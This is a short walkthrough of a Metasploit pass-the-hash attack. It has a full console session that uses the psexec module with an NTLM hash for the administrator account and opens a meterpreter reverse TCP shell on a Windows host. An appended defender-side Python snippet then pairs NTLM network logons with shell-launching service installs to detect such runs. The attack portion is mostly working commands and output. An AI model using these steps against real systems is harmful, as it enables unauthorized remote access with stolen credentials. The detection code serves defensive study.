Pass The Hash Reverse Shell With Metasploit


root@kali:/usr/bin# ./msfconsole
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost
lhost =>
msf exploit(psexec) > set rhost
rhost =>
msf exploit(psexec) > set smbpass 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4
smbpass => 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4
msf exploit(psexec) > set smbuser administrator
smbuser => administrator
msf exploit(psexec) > set smbdomain test
smbdomain => test
msf exploit(psexec) > exploit

[*] Started reverse TCP handler on
[*] Connecting to the server...
[*] Authenticating to|test as user 'administrator'...
[*] Selecting PowerShell target
[*] - Executing the payload...
[+] - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to
[*] Meterpreter session 1 opened ( -> at 2016-03-09 16:44:58 -0500

meterpreter > shell
Process 2212 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
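
A defender-side view of the session above, as an added example that is not part of the original post: the run authenticates over SMB with an NTLM hash and then starts a service that launches PowerShell, so on the target a Security 4624 network logon using NTLM is followed within seconds by a System 7045 service install. The sample events, the 60-second window and the ImagePath text are constructed assumptions, not values from the page.

```python
from datetime import datetime, timedelta

# Constructed sample events for one host (not taken from the page).
# Field names follow Security event 4624 and System event 7045.
EVENTS = [
    {"id": 4624, "time": "2016-03-09T10:00:00", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "svc_backup",
     "IpAddress": "192.0.2.20"},  # routine NTLM file-share logon
    {"id": 7045, "time": "2016-03-09T12:00:00", "ServiceName": "PrintHelper",
     "ImagePath": r"C:\Program Files\Vendor\helper.exe"},  # ordinary install
    {"id": 4624, "time": "2016-03-09T16:44:55", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "administrator",
     "IpAddress": "192.0.2.10"},
    {"id": 7045, "time": "2016-03-09T16:44:57", "ServiceName": "kPzRwQxT",
     # Assumed ImagePath shape for a service that launches PowerShell
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden"},
    {"id": 7045, "time": "2016-03-09T18:00:00", "ServiceName": "NightlyJob",
     "ImagePath": r"cmd.exe /c C:\jobs\nightly.bat"},  # shell service, no logon nearby
]

SHELL_HINTS = ("powershell", "%comspec%", "cmd.exe")
WINDOW = timedelta(seconds=60)  # assumed correlation window


def ts(event):
    return datetime.fromisoformat(event["time"])


def is_ntlm_network_logon(event):
    return (event["id"] == 4624 and event.get("LogonType") == 3
            and event.get("AuthenticationPackageName", "").upper() == "NTLM")


def is_shell_service(event):
    path = event.get("ImagePath", "").lower()
    return event["id"] == 7045 and any(hint in path for hint in SHELL_HINTS)


def find_remote_service_exec(events, window=WINDOW):
    """Pair each shell-launching service install with an NTLM network
    logon that happened at most `window` before it on the same host."""
    logons = [e for e in events if is_ntlm_network_logon(e)]
    hits = []
    for svc in filter(is_shell_service, events):
        match = next((lg for lg in logons
                      if timedelta(0) <= ts(svc) - ts(lg) <= window), None)
        if match:
            hits.append((match, svc))
    return hits
```

Neither event is alerted on by itself here: NTLM network logons and service installs both occur routinely, and only the pairing inside the window is reported.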


